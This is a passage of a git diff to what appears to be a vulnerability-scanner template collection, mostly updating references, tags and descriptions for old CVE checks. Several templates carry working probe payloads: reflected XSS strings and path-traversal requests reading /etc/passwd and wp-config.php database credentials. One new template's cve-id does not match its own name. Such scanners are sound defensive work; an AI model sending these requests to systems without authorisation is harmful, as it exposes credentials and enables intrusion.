+    - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
     - https://www.exploit-db.com/exploits/21811
+    - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
+    - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
+    - https://nvd.nist.gov/vuln/detail/CVE-2002-1131
   classification:
     cve-id: CVE-2002-1131
-  tags: xss,squirrelmail,cve,cve2002
+  tags: cve2002,edb,xss,squirrelmail,cve
 
 requests:
   - method: GET
@@ -36,3 +42,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml
index 341a5a3071..ab269e8cb5 100644
--- a/cves/2004/CVE-2004-0519.yaml
+++ b/cves/2004/CVE-2004-0519.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/24068
     - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
+    - http://security.gentoo.org/glsa/glsa-200405-16.xml
+    - http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
+  remediation: Upgrade to the latest version.
   classification:
     cve-id: CVE-2004-0519
-  remediation: Upgrade to the latest version.
-  tags: xss,squirrelmail,cve2004,cve
+  tags: squirrelmail,cve2004,cve,edb,xss
 
 requests:
   - method: GET
diff --git a/cves/2005/CVE-2005-2428.yaml b/cves/2005/CVE-2005-2428.yaml
index 3e3965fc30..ebfaa8b693 100644
--- a/cves/2005/CVE-2005-2428.yaml
+++ b/cves/2005/CVE-2005-2428.yaml
@@ -4,18 +4,18 @@ info:
   name: Lotus Domino R5 and R6 WebMail - Information Disclosure
   author: CasperGN
   severity: medium
-  description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)."
+  description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
   reference:
     - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
     - https://www.exploit-db.com/exploits/39495
     - https://nvd.nist.gov/vuln/detail/CVE-2005-2428
+  remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2005-2428
     cwe-id: CWE-200
-  remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
-  tags: cve,cve2005,domino
+  tags: domino,edb,cve,cve2005
 
 requests:
   - method: GET
diff --git a/cves/2005/CVE-2005-3344.yaml b/cves/2005/CVE-2005-3344.yaml
index 0ecf252d99..b0c576e378 100644
--- a/cves/2005/CVE-2005-3344.yaml
+++ b/cves/2005/CVE-2005-3344.yaml
@@ -8,15 +8,18 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2005-3344
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
+    - http://www.debian.org/security/2005/dsa-884
+    - http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
   classification:
     cve-id: CVE-2005-3344
-  tags: horde,unauth
+  tags: cve,cve2005,horde,unauth
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/horde/admin/user.php"
       - "{{BaseURL}}/admin/user.php"
+
     headers:
       Content-Type: text/html
 
@@ -26,7 +29,6 @@ requests:
       - type: word
         words:
           - "<title>Horde :: User Administration</title>"
-        condition: and
 
       - type: status
         status:
diff --git a/cves/2005/CVE-2005-4385.yaml b/cves/2005/CVE-2005-4385.yaml
index 8d3c3a2d81..1e9d1f456d 100644
--- a/cves/2005/CVE-2005-4385.yaml
+++ b/cves/2005/CVE-2005-4385.yaml
@@ -1,12 +1,13 @@
 id: CVE-2005-4385
 
 info:
-  name: Cofax <= 2.0RC3 XSS
+  name: Cofax <=2.0RC3 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
+  description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
   reference:
     - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
+    - http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
     - https://nvd.nist.gov/vuln/detail/CVE-2005-4385
   classification:
     cve-id: CVE-2005-4385
@@ -26,3 +27,5 @@ requests:
         part: body
         words:
           - "'>\"</script><script>alert(document.domain)</script>"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2006/CVE-2006-1681.yaml b/cves/2006/CVE-2006-1681.yaml
index 83e7678985..283b857a26 100644
--- a/cves/2006/CVE-2006-1681.yaml
+++ b/cves/2006/CVE-2006-1681.yaml
@@ -1,12 +1,14 @@
 id: CVE-2006-1681
 
 info:
-  name: Cherokee HTTPD <=0.5 XSS
+  name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
+  description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
   reference:
-    - https://www.securityfocus.com/bid/17408
+    - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
+    - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
+    - http://www.vupen.com/english/advisories/2006/1292
     - https://nvd.nist.gov/vuln/detail/CVE-2006-1681
   classification:
     cve-id: CVE-2006-1681
@@ -30,3 +32,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
index 8afac3689e..9834d5ffee 100644
--- a/cves/2006/CVE-2006-2842.yaml
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -1,18 +1,22 @@
 id: CVE-2006-2842
 
 info:
-  name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
+  name: Squirrelmail <=1.4.6 - Local File Inclusion
   author: dhiyaneshDk
   severity: high
-  description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute
-    arbitrary PHP code via a URL in the plugins array parameter.  NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals
-    is enabled.  Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE.  However, the original developer has posted a security advisory, so there
-    might be relevant real-world environments under which this vulnerability is applicable.'
+  description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
   reference:
     - https://www.exploit-db.com/exploits/27948
+    - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
+    - http://www.squirrelmail.org/security/issue/2006-06-01
+    - http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-2842
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2006-2842
-  tags: cve2006,lfi,squirrelmail,cve
+    cwe-id: CWE-22
+  tags: cve,cve2006,lfi,squirrelmail,edb
 
 requests:
   - method: GET
@@ -29,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml
index 2cc0670c14..4c0e56ac25 100644
--- a/cves/2007/CVE-2007-0885.yaml
+++ b/cves/2007/CVE-2007-0885.yaml
@@ -1,12 +1,15 @@
 id: CVE-2007-0885
 
 info:
-  name: Rainbow.Zen Jira XSS
+  name: Jira Rainbow.Zen - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
+  description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
   reference:
-    - https://www.securityfocus.com/archive/1/459590/100/0/threaded
+    - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
+    - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-0885
   classification:
     cve-id: CVE-2007-0885
   tags: cve,cve2007,jira,xss
@@ -30,3 +33,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml
index 44ac9a5200..98144c6f06 100644
--- a/cves/2007/CVE-2007-4504.yaml
+++ b/cves/2007/CVE-2007-4504.yaml
@@ -1,16 +1,21 @@
 id: CVE-2007-4504
 
 info:
-  name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
+  name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
+  description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
   reference:
     - https://www.exploit-db.com/exploits/4307
     - https://www.cvedetails.com/cve/CVE-2007-4504
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-4504
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2007-4504
-  tags: cve,cve2007,joomla,lfi
+    cwe-id: CWE-22
+  tags: lfi,edb,cve,cve2007,joomla
 
 requests:
   - method: GET
@@ -27,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
index ab30957300..7bae9bf531 100644
--- a/cves/2007/CVE-2007-4556.yaml
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -5,11 +5,12 @@ info:
   author: pikpikcu
   severity: critical
   description: |
-      Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
+    Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
   reference:
     - https://www.guildhab.top/?p=2326
     - https://nvd.nist.gov/vuln/detail/CVE-2007-4556
     - https://cwiki.apache.org/confluence/display/WW/S2-001
+    - http://forums.opensymphony.com/ann.jspa?annID=54
   classification:
     cve-id: CVE-2007-4556
   tags: cve,cve2007,apache,rce,struts
diff --git a/cves/2007/CVE-2007-5728.yaml b/cves/2007/CVE-2007-5728.yaml
index 2adfe607de..f9b21ef140 100644
--- a/cves/2007/CVE-2007-5728.yaml
+++ b/cves/2007/CVE-2007-5728.yaml
@@ -1,17 +1,21 @@
 id: CVE-2007-5728
 
 info:
-  name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
+  name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
+  description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
   reference:
     - https://www.exploit-db.com/exploits/30090
+    - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
+    - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
+    - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-5728
   classification:
     cve-id: CVE-2007-5728
   metadata:
     shodan-query: http.title:"phpPgAdmin"
-  tags: cve,cve2007,xss,pgadmin,phppgadmin
+  tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
 
 requests:
   - method: GET
@@ -33,3 +37,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2008/CVE-2008-1059.yaml b/cves/2008/CVE-2008-1059.yaml
new file mode 100644
index 0000000000..5d90733c1f
--- /dev/null
+++ b/cves/2008/CVE-2008-1059.yaml
@@ -0,0 +1,39 @@
+id: CVE-2008-1059
+
+info:
+  name: WordPress Sniplets 1.1.2 - Local File Inclusion
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/5194
+    - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
+    - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2008-1061
+    cwe-id: CWE-22
+  tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2008/CVE-2008-1061.yaml b/cves/2008/CVE-2008-1061.yaml
new file mode 100644
index 0000000000..3e17bab6ba
--- /dev/null
+++ b/cves/2008/CVE-2008-1061.yaml
@@ -0,0 +1,40 @@
+id: CVE-2008-1061
+
+info:
+  name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: |
+    WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
+  reference:
+    - https://www.exploit-db.com/exploits/5194
+    - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
+    - http://secunia.com/advisories/29099
+  classification:
+    cve-id: CVE-2008-1061
+  tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2008/CVE-2008-2398.yaml b/cves/2008/CVE-2008-2398.yaml
index d82031abc8..1f91e0a6b6 100644
--- a/cves/2008/CVE-2008-2398.yaml
+++ b/cves/2008/CVE-2008-2398.yaml
@@ -1,12 +1,16 @@
 id: CVE-2008-2398
 
 info:
-  name: AppServ Open Project 2.5.10 and earlier XSS
+  name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
   author: unstabl3
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
+  description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
   reference:
     - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
+    - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
+    - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
+    - http://securityreason.com/securityalert/3896
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-2398
   classification:
     cve-id: CVE-2008-2398
   tags: cve,cve2008,xss
@@ -30,3 +34,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml
index 2c186cd941..727eba9f89 100644
--- a/cves/2008/CVE-2008-2650.yaml
+++ b/cves/2008/CVE-2008-2650.yaml
@@ -1,29 +1,40 @@
-id: CVE-2008-2650
+id: CVE-2008-2650
 
-info:
-  name: CMSimple 3.1 - Local File Inclusion
-  author: pussycat0x
-  severity: high
-  description: |
-    Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
-  reference: https://www.exploit-db.com/exploits/5700
-  classification:
-    cve-id: CVE-2008-2650
-  tags: cve,cve2008,lfi
+info:
+  name: CMSimple 3.1 - Local File Inclusion
+  author: pussycat0x
+  severity: high
+  description: |
+    CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
+  reference:
+    - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
+    - http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
+    - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-2650
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2008-2650
+    cwe-id: CWE-22
+  tags: cve,cve2008,lfi,cmsimple
 
-requests:
-  - raw:
-      - |
-        GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+requests:
+  - raw:
+      - |
+        GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml
index b021243349..9a7dd52117 100644
--- a/cves/2008/CVE-2008-4668.yaml
+++ b/cves/2008/CVE-2008-4668.yaml
@@ -1,16 +1,19 @@
 id: CVE-2008-4668
 
 info:
-  name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
+  name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
+  description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/6618
     - https://www.cvedetails.com/cve/CVE-2008-4668
+    - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
+    - http://securityreason.com/securityalert/4464
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-4668
   classification:
     cve-id: CVE-2008-4668
-  tags: cve,cve2008,joomla,lfi
+  tags: cve,cve2008,joomla,lfi,edb
 
 requests:
   - method: GET
@@ -27,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml
index c200752dfd..4b90a27a79 100644
--- a/cves/2008/CVE-2008-4764.yaml
+++ b/cves/2008/CVE-2008-4764.yaml
@@ -1,17 +1,22 @@
 id: CVE-2008-4764
 
 info:
-  name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
+  name: Joomla! <=2.0.0 RC2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in
-    a show_error action.
+  description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
   reference:
     - https://www.exploit-db.com/exploits/5435
     - https://www.cvedetails.com/cve/CVE-2008-4764
+    - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-4764
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2008-4764
-  tags: cve,cve2008,joomla,lfi
+    cwe-id: CWE-22
+  tags: edb,cve,cve2008,joomla,lfi
 
 requests:
   - method: GET
@@ -28,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml
index ebf602921e..3e5a2f3635 100644
--- a/cves/2008/CVE-2008-5587.yaml
+++ b/cves/2008/CVE-2008-5587.yaml
@@ -1,17 +1,21 @@
 id: CVE-2008-5587
 
 info:
-  name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
+  name: phpPgAdmin <=4.2.1 - Local File Inclusion
   author: dhiyaneshDK
   severity: medium
-  description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+  description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/7363
+    - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
+    - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
+    - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-5587
   classification:
     cve-id: CVE-2008-5587
   metadata:
     shodan-query: http.title:"phpPgAdmin"
-  tags: cve2008,lfi,phppgadmin
+  tags: cve,cve2008,lfi,phppgadmin,edb
 
 requests:
   - method: GET
@@ -28,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2008/CVE-2008-6080.yaml b/cves/2008/CVE-2008-6080.yaml
index 075e57a751..7a5240ac84 100644
--- a/cves/2008/CVE-2008-6080.yaml
+++ b/cves/2008/CVE-2008-6080.yaml
@@ -1,16 +1,22 @@
 id: CVE-2008-6080
 
 info:
-  name: Joomla! Component ionFiles 4.4.2 - File Disclosure
+  name: Joomla! ionFiles 4.4.2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
   reference:
     - https://www.exploit-db.com/exploits/6809
     - https://www.cvedetails.com/cve/CVE-2008-6080
+    - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
+    - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-6080
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2008-6080
-  tags: cve,cve2008,joomla,lfi
+    cwe-id: CWE-22
+  tags: edb,cve,cve2008,joomla,lfi
 
 requests:
   - method: GET
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml
index 9b3280e643..362a408e8f 100644
--- a/cves/2008/CVE-2008-6172.yaml
+++ b/cves/2008/CVE-2008-6172.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/6817
     - https://www.cvedetails.com/cve/CVE-2008-6172
+    - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
+    - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
   classification:
     cve-id: CVE-2008-6172
-  tags: cve,cve2008,joomla,lfi
+  tags: cve2008,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2008/CVE-2008-6222.yaml b/cves/2008/CVE-2008-6222.yaml
index b5447a9956..dd11e3ad7a 100644
--- a/cves/2008/CVE-2008-6222.yaml
+++ b/cves/2008/CVE-2008-6222.yaml
@@ -1,16 +1,22 @@
 id: CVE-2008-6222
 
 info:
-  name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
+  name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
+  description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/6980
     - https://www.cvedetails.com/cve/CVE-2008-6222
+    - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
+    - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-6222
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2008-6222
-  tags: cve,cve2008,joomla,lfi
+    cwe-id: CWE-22
+  tags: cve2008,joomla,lfi,edb,cve
 
 requests:
   - method: GET
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2008/CVE-2008-6668.yaml b/cves/2008/CVE-2008-6668.yaml
index ed5ce42391..781876d1ea 100644
--- a/cves/2008/CVE-2008-6668.yaml
+++ b/cves/2008/CVE-2008-6668.yaml
@@ -1,16 +1,21 @@
 id: CVE-2008-6668
 
 info:
-  name: nweb2fax <= 0.2.7 Directory Traversal
+  name: nweb2fax <=0.2.7 - Local File Inclusion
   author: geeknik
   severity: high
